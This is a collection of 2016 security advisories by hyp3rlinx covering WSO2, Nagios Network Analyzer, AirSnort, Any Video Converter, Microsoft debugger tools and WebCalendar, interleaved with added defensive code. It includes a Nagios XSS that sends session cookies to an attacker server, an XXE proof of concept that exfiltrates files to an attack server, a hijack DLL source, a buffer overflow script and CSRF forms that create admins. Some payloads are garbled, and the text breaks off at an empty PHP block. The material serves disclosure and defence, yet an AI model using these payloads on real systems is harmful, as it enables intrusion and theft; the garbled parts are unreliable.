[+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-CSRF-DOS.txt
[+] ISR: ApparitionSec

Vendor:
www.wso2.com

Product:
Ws02Carbon v4.4.5

WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts. In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security, logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario.

Vulnerability Type:
Cross Site Request Forgery / DOS

CVE Reference:
CVE-2016-4315

Vulnerability Details:
The attack involves tricking a privileged user into initiating a request, by clicking a malicious link or visiting an evil webpage, that shuts down WSO2 Servers.

References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0101

The getSafeText() function and the conditional logic below process the "action" parameter with no check for inbound CSRF attacks.

String cookie = (String) session.getAttribute(ServerConstants.ADMIN_SERVICE_COOKIE);
String action = CharacterEncoder.getSafeText(request.getParameter("action"));
ServerAdminClient client = new ServerAdminClient(ctx, backendServerURL, cookie, session);
try {
    if ("restart".equals(action)) {
        client.restart();
    } else if ("restartGracefully".equals(action)) {
        client.restartGracefully();
    } else if ("shutdown".equals(action)) {
        client.shutdown();
    } else if ("shutdownGracefully".equals(action)) {
        client.shutdownGracefully();
    }
} catch (Exception e) {
    response.sendError(500, e.getMessage());
    return;
}

Exploit code(s):
Shutdown the Carbon server

https://victim-server:9443/carbon/server-admin/proxy_ajaxprocessor.jsp?action=shutdown;>Shut it down!

Disclosure Timeline:
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure

Exploitation Technique:
Remote

Severity Level:
Medium

HYP3RLINX

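The ntopng advisory earlier on this page (token accepted when absent or arbitrary) and the Carbon handler above (no token at all, and the action taken over a plain GET) share one missing server-side check. The following is an added example, not ntopng's or WSO2's code, of how a state-changing admin endpoint should gate a request; the session dict, the "csrf" and "action" parameter names and the action set are assumptions modelled on the Carbon snippet.

```python
import hmac
import secrets

# Actions taken from the Carbon handler above; anything else is refused.
STATE_CHANGING_ACTIONS = {"restart", "restartGracefully",
                          "shutdown", "shutdownGracefully"}


class CsrfError(PermissionError):
    """Request refused before any server-admin action is taken."""


def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the authenticated session. The token
    is emitted into the admin page's forms, never into a bare link."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def authorize_admin_action(method: str, params: dict, session: dict) -> str:
    """Return the validated action name or raise CsrfError.

    Checks, in order:
      1. state changes only over POST (a GET can be fired by an <a> or
         <img> on any page the victim visits);
      2. the token must be present (ntopng accepted its absence);
      3. the token must equal the session-bound value, compared in constant
         time (ntopng accepted any value, e.g. "NOT-EVEN-CHECKED");
      4. the action must be one of the known values.
    """
    if method.upper() != "POST":
        raise CsrfError("state-changing actions require POST")
    expected = session.get("csrf_token")
    supplied = params.get("csrf")
    if not expected or not supplied:
        raise CsrfError("missing CSRF token")
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        raise CsrfError("CSRF token mismatch")
    action = params.get("action", "")
    if action not in STATE_CHANGING_ACTIONS:
        raise CsrfError(f"unknown action {action!r}")
    return action


def outcome(method: str, params: dict, session: dict) -> str:
    """Convenience wrapper returning 'allowed:<action>' or 'denied:<why>'."""
    try:
        return "allowed:" + authorize_admin_action(method, params, session)
    except CsrfError as exc:
        return "denied:" + str(exc)
```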
WSO2 CARBON v4.4.5 PERSISTENT XSS COOKIE THEFT
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-PERSISTENT-XSS-COOKIE-THEFT.txt
[+] ISR: ApparitionSec

Vendor:
www.wso2.com

Product:
Ws02Carbon v4.4.5

WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts. In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security, logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario.

Vulnerability Type:
Persistent / Reflected Cross Site Scripting (XSS) - Cookie Disclosure

CVE Reference:
CVE-2016-4316

Vulnerability Details:
WSO2 Carbon has multiple XSS vectors allowing attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy, steal session cookies, and serve as a platform for further attacks on the system.

Exploit code(s):

Persistent XSS:

GET Request

https://victim-server:9443/carbon/identity-mgt/challenges-mgt.jsp?addRowId=XSS="/>alert(document.cookie)

Request two is POST /carbon/identity-mgt/challenges-mgt-finish.jsp

setName=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E==City+where+you+were+born+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=City+where+you+were+born+%3F=Father%27s+middle+name+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Father%27s+middle+name+%3F=Name+of+your+first+pet+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Name+of+your+first+pet+%3F=Favorite+sport+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Favorite+sport+%3F=Favorite+food+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Favorite+food+%3F=Favorite+vacation+location+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Favorite+vacation+location+%3F=Model+of+your+first+car+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Model+of+your+first+car+%3F=Name+of+the+hospital+where+you+were+born+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Name+of+the+hospital+where+you+were+born+%3F=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E=XSS

The XSS payload will then be listed at the URL below:

https://victim-server:9443/carbon/identity-mgt/challenges-set-mgt.jsp?region=region1=identity_security_questions_menu

Finally, when the victim clicks "Delete" on an entry on the page, the XSS is executed.

Here is the stored payload from the HTML source:

Delete
///

Reflected XSS

XSS #1
https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war=all=victim-server=9763=victim-server=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E

XSS #2
https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?dsName=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29=HELL

XSS #3
https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?description=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29=true

XSS #4
https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war=all=victim-server=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E=victim-server=

XSS #5
https://victim-server:9443/carbon/viewflows/handlers.jsp?retainlastbc=true=in=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

XSS #6
https://victim-server:9443/carbon/ndatasource/validateconnection-ajaxprocessor.jsp?=WSO2_CARBON_DB=com.mysql.jdbc.Driver=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E=root=RDBMS=RDBMS=default=undefined=undefined=undefined=false=true=

Disclosure Timeline:
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure

Exploitation Technique:
Remote

Severity Level:
Medium

WSO2 IDENTITY-SERVER v5.1.0 XML External-Entity
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-IDENTITY-SERVER-v5.1.0-XML-External-Entity.txt
[+] ISR: ApparitionSec

Vendor:
www.wso2.com

Product:
Wso2 Identity Server v5.1.0

As the industry's first enterprise identity bus (EIB), WSO2 Identity Server is the central backbone that connects and manages multiple identities across applications, APIs, the cloud, mobile, and Internet of Things devices, regardless of the standards on which they are based. The multi-tenant WSO2 Identity Server can be deployed directly on servers or in the cloud, and has the ability to propagate identities across geographical and enterprise borders in a connected business environment.

Vulnerability Type:
XML External Entity / CSRF

CVE Reference(s):
CVE-2016-4312 (XXE)
CVE-2016-4311 (CSRF)

Vulnerability Details:
The WSO2IS XML parser is vulnerable to an XXE attack in the XACML flow. This can be exploited when XML input containing a reference to an external entity is processed by a weakly configured XML parser. The attack leads to the disclosure and exfiltration of confidential data and arbitrary system files, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located (localhost), and other system impacts.

The exploit can be carried out locally by an internal malicious user, or remotely via CSRF if an authenticated user clicks an attacker-supplied link or visits an evil webpage. In the case of WSO2IS, system files can be read / exfiltrated to the remote attacker's server for safe keeping -_-

References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0096

Exploit code(s):
XXE POC, exfiltrate the victim's Windows hosts file to our remote server.

1) Form for the XXE POST request.

https://victim-server:9443/carbon/entitlement/eval-policy-submit.jsp?withPDP=false; method="post"> http://attackserver:8080/payload.dtd;> %dtd;]> document.getElementById('XXE').submit()

2) DTD file on the attacker server.

http://attackserver:8080?%file;'>"> %all;

3) On the attack server, create a listener for the victim's HTTP request.

python -m SimpleHTTPServer 8080

Disclosure Timeline:
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure

Exploitation Technique:
Remote

Severity Level:
High

HYP3RLINX

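The PoC above relies on the parser honouring a DOCTYPE with an external parameter entity (%dtd;) fetched from the attacker's host. The following is an added example, not WSO2 code, of the simplest robust parser setting for an endpoint like the XACML policy evaluator: refuse any document that carries a DOCTYPE at all, using Python's bundled expat parser. Both XML samples are constructed for the demonstration; the host name in the second one is a placeholder.

```python
import xml.parsers.expat


class DoctypeRejected(ValueError):
    """Raised when a document declares a DTD, which is the only place an
    external entity (the XXE vector) can be declared."""


def parse_request_without_dtd(document: bytes) -> list:
    """Parse an XML request and return the element names seen, refusing
    any document that declares a DOCTYPE.

    With no DTD there is nowhere to declare an external general entity, an
    external parameter entity (the %dtd; trick above) or an entity bomb,
    so the check does not depend on which entity-loading features a given
    parser build enables by default.
    """
    parser = xml.parsers.expat.ParserCreate()
    seen = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # expat invokes this as soon as "<!DOCTYPE" is read, before any
        # entity declaration inside it is processed. An exception raised in
        # a handler propagates out of Parse(), aborting the parse.
        raise DoctypeRejected(f"DOCTYPE {name!r} refused (system id {sysid!r})")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(document, True)
    return seen


# Constructed XACML 3.0 request of the kind the evaluator accepts.
BENIGN_REQUEST = b"""<?xml version="1.0"?>
<Request xmlns="urn:oasis:names:tc:xacml:3.0:core:schema:wd-17">
  <Attributes Category="urn:oasis:names:tc:xacml:1.0:subject-category:access-subject">
    <Attribute AttributeId="urn:oasis:names:tc:xacml:1.0:subject:subject-id">
      <AttributeValue DataType="http://www.w3.org/2001/XMLSchema#string">alice</AttributeValue>
    </Attribute>
  </Attributes>
</Request>
"""

# Same shape as the PoC: an external parameter entity pulled from a remote
# DTD. attacker.example is a placeholder host; nothing is fetched because
# the parse is aborted at the DOCTYPE.
XXE_SHAPED_REQUEST = b"""<?xml version="1.0"?>
<!DOCTYPE Request [
  <!ENTITY % dtd SYSTEM "http://attacker.example/payload.dtd">
  %dtd;
]>
<Request><Attributes/></Request>
"""


def classify(document: bytes) -> str:
    """'accepted' or 'rejected: <reason>' for a submitted request body."""
    try:
        parse_request_without_dtd(document)
        return "accepted"
    except DoctypeRejected as exc:
        return "rejected: " + str(exc)
```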
Nagios NA v2.2.1 XSS
[+] Credits: John Page - HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-XSS.txt
[+] ISR: ApparitionSec

Vendor:
www.nagios.com

Product:
Nagios Network Analyzer v2.2.1

Netflow Analysis, Monitoring, and Bandwidth Utilization Software. Network Analyzer provides an in-depth look at all network traffic sources and potential security threats, allowing system admins to quickly gather high-level information regarding the health of the network as well as highly granular data for complete and thorough network analysis.

Vulnerability Type:
Cross Site Scripting (XSS)

CVE Reference:
N/A

Vulnerability Details:
Nagios NA has an XSS vector which enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. The application seems to filter injection of "document.cookie"; however, we can bypass this by using document['cookie'] in its place.

Exploit code(s):
Steal Session Cookie

http://victim-server/nagiosna/index.php/sources/queries/1?q[begindate]=-24+hours[enddate]=-1+second[aggregate_csv]=[qid]=%27%27;window.open(%22http://attacker-server/c.php?c=%22%2bdocument[%27cookie%27])//

Disclosure Timeline:
Vendor Notification: July 20, 2016
Vendor Acknowledgement: July 21, 2016
Vendor Fix / Release: August 1, 2016
August 8, 2016 : Public Disclosure

Exploitation Technique:
Remote

Severity Level:
Low

HYP3RLINX

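The document['cookie'] bypass above, like the six reflected vectors in the WSO2 Carbon XSS advisory earlier on this page, shows why stripping known-bad tokens from input does not prevent XSS: the same property has many spellings. The following is an added example, not Nagios or WSO2 code, contrasting a token blocklist of the kind the advisory describes with context-aware output encoding; the blocklist function is constructed to illustrate the failure mode, and the JavaScript-string context is assumed from the PoC's [qid]=''; injection.

```python
import html
import json

# The reported bypass: document.cookie reached by a different spelling.
PAYLOAD = "'';window.open(\"http://attacker-server/c.php?c=\"+document['cookie'])//"


def blocklist_filter(value: str) -> str:
    """A filter of the kind the advisory describes (constructed here to
    show the failure mode): remove one spelling of the dangerous
    expression and pass everything else through."""
    return value.replace("document.cookie", "")


def still_reads_cookie(js_fragment: str) -> bool:
    """Rough check used only to show what the blocklist misses: does the
    fragment still reach document.cookie by an obvious spelling? (There
    are many more spellings, which is the point.)"""
    spellings = ("document.cookie", "document['cookie']", 'document["cookie"]')
    return any(s in js_fragment for s in spellings)


def encode_for_js_string(value: str) -> str:
    """Output encoding for a value that lands inside a JavaScript string
    literal. json.dumps escapes quotes and backslashes, so the value cannot
    end the literal; the extra replacements stop "</script>" or HTML
    comment markers in the data from ending the script block, and
    neutralise the two Unicode line terminators older JS engines treat as
    line breaks."""
    encoded = json.dumps(value)
    for raw, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                     ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        encoded = encoded.replace(raw, esc)
    return encoded


def encode_for_html_attribute(value: str) -> str:
    """Output encoding for a value placed in a quoted HTML attribute, the
    context of the Carbon "/><script> vectors."""
    return html.escape(value, quote=True)


def compare(value: str) -> dict:
    """Summarise how each approach treats the same input."""
    filtered = blocklist_filter(value)
    encoded = encode_for_js_string(value)
    return {
        "blocklist_output_unchanged": filtered == value,
        "blocklist_still_reads_cookie": still_reads_cookie(filtered),
        # The encoded form is one JS string literal: decoding it yields the
        # original text, and it begins and ends with the delimiting quotes.
        "encoded_round_trips": json.loads(encoded) == value,
        "encoded_is_one_literal": encoded.startswith('"') and encoded.endswith('"'),
    }
```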
AirSnort v0.2.7 Stack Corruption DOS
[+] Credits: Hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AIRSNORT-STACK-CORRUPTION-DOS.txt
[+] ISR: ApparitionSec

Vendor:
sourceforge.net/projects/airsnort/

Product:
AirSnort v0.2.7

AirSnort is a wireless LAN (WLAN) tool which cracks encryption keys on 802.11b WEP networks. AirSnort operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered.

Vulnerability Type:
Stack Corruption DOS

Vulnerability Details:
When opening / loading a corrupt 'crackfile' containing a bunch of 'A's, airsnort crashes and the stack is corrupted. Under File / Load "Crack" File..., open a corrupt crackfile with a bunch of 'A' chars, then BOOM...

Tested successfully on Linux OS.

GDB reg dump

Program received signal SIGSEGV, Segmentation fault.
0xb72780e5 in __mempcpy_ia32 () from /lib/libc.so.6
(gdb) info r
eax            0x4141413b    1094795579
ecx            0x3e3995
edx            0x829e9d8     136964568
ebx            0xb73c1000    -1220800512
esp            0xbfffe1dc    0xbfffe1dc
ebp            0x0           0x0
esi            0xb67cf00a    -1233326070
edi            0x0           0
eip            0xb72780e5    0xb72780e5 <__mempcpy_ia32+21>
eflags         0x210203      [ CF IF RF ID ]
cs             0x73          115
ss             0x7b          123
ds             0x7b          123
es             0x7b          123
fs             0x0           0
gs             0x33          51

HYP3RLINX

Any Video Converter DLL Hijack
[+] Credits: HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ANY-VIDEO-CONVERTER-DLL-HIJACK.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.any-video-converter.com

Product:
========
AVCSoft / Any Video Converter v5.9.5

AVCFree.exe is a video downloader and converter.

Vulnerability Type:
===================
DLL Hijack

CVE Reference:
==============
N/A

Vulnerability Details:
======================
Vulnerable DLL: libx265_main10.dll

AVCFree.exe will search for and load any DLL named "libx265_main10.dll". If an attacker can place the DLL in a location where the victim opens a file in AVCFree, it will load and run the attacker's DLL and code. In testing I noticed that if the file type is associated with AVCFree.exe as the default program to open it with, then double clicking the file will load and execute the vulnerable DLL. If the file type is not associated with AVCFree, then right clicking and choosing to open with AVCFree will do the same.

Right click or double click and open in AVCFree.exe any of the following file types, then BOOM:

.mp4, .mp3, .mpg, .mpeg, .iso, .divx, .wav, .flv, .avs, .mov and probably more...

Exploit code(s):
================
1) Save and compile the C code below as 'libx265_main10.c' to create the vulnerable DLL
2) Place it on a remote share or another directory like "downloads"
3) Right click or double click an .mpg file or any of the extensions listed above to open it with AVCFree.exe, then BOOM!

#include <windows.h>

// gcc -c libx265_main10.c
// gcc -shared -o libx265_main10.dll libx265_main10.o

// Runs as soon as AVCFree.exe maps the DLL: proof that code from the
// planted library executes inside the application.
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
    switch (reason) {
        case DLL_PROCESS_ATTACH:
            MessageBox(NULL, "Arbitrary Code Exec", "PWNED!", MB_OK);
            break;
    }
    return TRUE;   // report successful initialisation to the loader
}

Disclosure Timeline:
====================
Vendor Notification: No Replies
August 8, 2016 : Public Disclosure

Severity Level:
===============
Medium
Nagios Network Analyzer v2.2.1 Multiple CSRF
[+] Credits: John Page - hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-MULTIPLE-CSRF.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.nagios.com

Product:
========
Nagios Network Analyzer v2.2.1

Netflow Analysis, Monitoring, and Bandwidth Utilization Software. Network Analyzer provides an in-depth look at all network traffic sources and potential security threats, allowing system admins to quickly gather high-level information regarding the health of the network as well as highly granular data for complete and thorough network analysis.

Vulnerability Type:
===================
Cross Site Request Forgery (CSRF)

CVE Reference:
==============
N/A

Vulnerability Details:
======================
Nagios NA has multiple CSRF vectors, allowing unauthorized commands to be transmitted from a user that the website trusts if that user is authenticated and visits a malicious webpage or clicks an attacker supplied link. The Nagios system can be compromised as remote attackers can create arbitrary commands, e.g. using "wget" to download RCE files onto the system, create arbitrary Admins, delete users, and conduct DOS attacks.

Exploit code(s):
================
1) Create arbitrary commands
   Form target: http://victim-server/nagiosna/index.php/api/system/create_command (method="post")
   document.forms[0].submit()

2) Add Admin
   Form target: http://victim-server/nagiosna/index.php/admin/users/create (method="post" accept-charset="utf-8")
   document.forms[0].submit()

3) Delete reports (report ID must be known or guessed)
   Form target: http://victim-server/nagiosna/index.php/api/reports/delete (method="post")
   document.forms[0].submit()

4) DOS
   Form target: http://victim-server/nagiosna/index.php/api/system/stop (method="post")
   //document.forms[0].submit()

5) Delete users (user ID must be known or guessed)
   Form target: http://victim-server/nagiosna/index.php/admin/users/delete (method="post")
   document.forms[0].submit()

Disclosure Timeline:
====================
Vendor Notification: July 20, 2016
Vendor Acknowledgement: July 21, 2016
Vendor Fix / Release: August 1, 2016
August 8, 2016 : Public Disclosure

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium
Microsoft Process Kill Utility "kill.exe" Buffer Overflow
[+] Credits: HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-KILL-UTILITY-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.microsoft.com

Product:
========
Microsoft Process Kill Utility "kill.exe"
File version: 6.3.9600.17298

The Kill tool (kill.exe) is a tool used to terminate a process, part of the WinDbg package.

Vulnerability Type:
===================
Buffer Overflow

SEH buffer overflow @ about 512 bytes

Vulnerability Details:
======================
Register dump:

SEH chain of main thread
Address    SE handler
001AF688   kernel32.756F489B
001AFBD8   52525252
           42424242   *** CORRUPT ENTRY ***

001BF81C   41414141
001BF820   41414141
001BF824   41414141
001BF828   41414141
001BF82C   41414141
001BF830   41414141
001BF834   909006EB   ë   Pointer to next SEH record
001BF838   52525252       SE handler <
001BF83C   90909090
001BF840   90909090

Exploit code(s):
================
Python POC.

import subprocess

# 508 bytes of 'A' filler reaching the SEH record
junk = "A" * 508 + ""
pgm = 'c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe'
# pass the oversized argument straight to kill.exe, no shell involved
subprocess.Popen([pgm, junk], shell=False)

Disclosure Timeline:
====================
Vendor Notification: June 24, 2016
Vendor reply: Will not security service
July 8, 2016 : Public Disclosure

Exploitation Technique:
=======================
Local

Severity Level:
===============
Low
Microsoft WinDbg logviewer.exe Buffer Overflow DOS
[+] Credits: HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-WINDBG-LOGVIEWER-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.microsoft.com

Product:
========
WinDbg logviewer.exe

LogViewer (logviewer.exe) is a tool that displays the logs created, part of the WinDbg application.

Vulnerability Type:
===================
Buffer Overflow DOS

Vulnerability Details:
======================
Buffer overflow in WinDbg "logviewer.exe" when opening corrupted .lgv files. The application crashes and the MMX/XMM registers etc. are overwritten. This utility belongs to Windows Kits/8.1/Debuggers/x86.

Read Access Violation / Memory Corruption

Win32 API Log Viewer 6.3.9600.17298
Windbg x86 logviewer.exe
Log Viewer 3.01 for x86

(5fb8.32fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\syswow64\msvcrt.dll -
eax=013dad30 ebx=005d0000 ecx=00000041 edx=00000000 esi=005d2000 edi=013dcd30
eip=754fa048 esp=0009f840 ebp=0009f848 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
msvcrt!memmove+0x1ee:
754fa048 660f6f06        movdqa  xmm0,xmmword ptr [esi] ds:002b:005d2000=

Full register dump:

gs 2b   fs 53   es 2b   ds 2b
edi 136cd30   esi 7d2000   ebx 7d   edx 0   ecx 41   eax 136ad30
ebp df750   eip 754fa048   cs 23   efl 210206   esp df748   ss 2b
dr0 0   dr1 0   dr2 0   dr3 0   dr6 0   dr7 0
di cd30   si 2000   bx 0   dx 0   cx 41   ax ad30   bp f750   ip a048   fl 206   sp f748
bl 0   dl 0   cl 41   al 30   bh 0   dh 0   ch 0   ah ad
fpcw 27f   fpsw 4020   fptw   fopcode 0   fpip 76454c1e   fpipsel 23   fpdp 6aec2c   fpdpsel 2b
st0 -1.00e+000   st1 -1.00e+000   st2 -1.00e+000   st3 9.60e+001
st4 1.08506945252884e-004   st5 -1.00e+000   st6 0.00e+000   st7 0.00e+000
mm0 0:2:2:2   mm1 0:0:2:202   mm2 0:1:1:1   mm3 c000:0:0:0
mm4 e38e:3900:0:0   mm5 0:0:0:0   mm6 0:0:0:0   mm7 0:0:0:0
mxcsr 1fa0
xmm0 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm1 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm2 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm3 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm4 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm5 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm6 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm7 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
iopl 0   of 0   df 0   if 1   tf 0   sf 0   zf 0   af 0   pf 1   cf 0   vip 0   vif 0
xmm0l 4141:4141:4141:4141   xmm1l 4141:4141:4141:4141   xmm2l 4141:4141:4141:4141   xmm3l 4141:4141:4141:4141
xmm4l 4141:4141:4141:4141   xmm5l 4141:4141:4141:4141   xmm6l 4141:4141:4141:4141   xmm7l 4141:4141:4141:4141
xmm0h 4141:4141:4141:4141   xmm1h 4141:4141:4141:4141   xmm2h 4141:4141:4141:4141   xmm3h 4141:4141:4141:4141
xmm4h 4141:4141:4141:4141   xmm5h 4141:4141:4141:4141   xmm6h 4141:4141:4141:4141   xmm7h 4141:4141:4141:4141
xmm0/0 41414141   xmm0/1 41414141   xmm0/2 41414141   xmm0/3 41414141
xmm1/0 41414141   xmm1/1 41414141   xmm1/2 41414141   xmm1/3 41414141
xmm2/0 41414141   xmm2/1 41414141   xmm2/2 41414141   xmm2/3 41414141
xmm3/0 41414141   xmm3/1 41414141   xmm3/2 41414141   xmm3/3 41414141
xmm4/0 41414141   xmm4/1 41414141   xmm4/2 41414141   xmm4/3 41414141
xmm5/0 41414141   xmm5/1 41414141   xmm5/2 41414141   xmm5/3 41414141
xmm6/0 41414141   xmm6/1 41414141   xmm6/2 41414141   xmm6/3 41414141
xmm7/0 41414141   xmm7/1 41414141   xmm7/2 41414141   xmm7/3 41414141

Exploit code(s):
================
1) Create an .lgv file containing a run of 'A's of length 4096; this overwrites the XMM registers, ECX etc.
2) Run logviewer.exe from the command line and pipe the file to it to watch it crash and burn.

Disclosure Timeline:
====================
Vendor Notification: June 23, 2016
Vendor acknowledged: July 1, 2016
Vendor reply: Will not fix (stability issue)
July 8, 2016 : Public Disclosure

Severity Level:
===============
Low
WebCalendar v1.2.7 CSRF Protection Bypass
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.k5n.us/webcalendar.php

Product:
========
WebCalendar v1.2.7

WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for groups of users, or as an event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase, MS SQL Server, or ODBC is required. WebCalendar can be set up in a variety of ways, such as...

- A schedule management system for a single person
- A schedule management system for a group of people, allowing one or more assistants to manage the calendar of another user
- An events schedule that anyone can view, allowing visitors to submit new events
- A calendar server that can be viewed with iCalendar-compliant calendar applications like Mozilla Sunbird, Apple iCal or GNOME Evolution, or RSS-enabled applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.

Vulnerability Type:
===================
CSRF PROTECTION BYPASS

CVE Reference:
==============
N/A

Vulnerability Details:
======================
WebCalendar attempts to use the HTTP Referer to check that requests originate from the same server, as we see below.

From WebCalendar "include/functions.php" file on line 6117:

function require_valide_referring_url () {
  global $SERVER_URL;

  if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
    // Missing the REFERER value
    //die_miserable_death ( translate ( 'Invalid referring URL' ) );
    // Unfortunately, some version of MSIE do not send this info.
    return true;
  }
  if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
    // Gotcha. URL of referring page is not the same as our server.
    // This can be an instance of XSRF.
    // (This may also happen when more than address is used for your server.
    // However, you're not supposed to do that with this version of
    // WebCalendar anyhow...)
    die_miserable_death ( translate ( 'Invalid referring URL' ) );
  }
}

However, this can be easily defeated by just not sending a referer. HTML 5 includes a handy meta tag to omit the referer when making an HTTP request, currently supported in Chrome, Safari, MobileSafari and other WebKit-based browsers. Using this meta tag we send no referrer and the vulnerable application will then happily process our CSRF requests.

Exploit code(s):
================
1) CSRF Protection Bypass to change Admin password POC.
   Note: Name of the victim user is required for success.
   Form target: http://localhost/WebCalendar-1.2.7/edit_user_handler.php (method="post")

2) CSRF Protection Bypass to modify access controls under "System Settings" / "Allow public access"
   Form target: http://localhost/WebCalendar-1.2.7/admin.php (method="post" name="prefform")
   document.getElementById('CSRF_ACCESS_CTRL').submit()

Disclosure Timeline:
====================
Vendor Notification: No replies
July 4, 2016 : Public Disclosure

Exploitation Technique:
=======================
Remote

Severity Level:
===============
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
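For the CSRF issues above (Nagios NA's unprotected POST handlers and WebCalendar's fail-open Referer check), the following is an added example and not code from either project: it places the shape of the original check next to a fail-closed origin comparison combined with a per-session synchronizer token. The function names, the site URL and the request arrays are assumptions made for illustration.

```php
<?php
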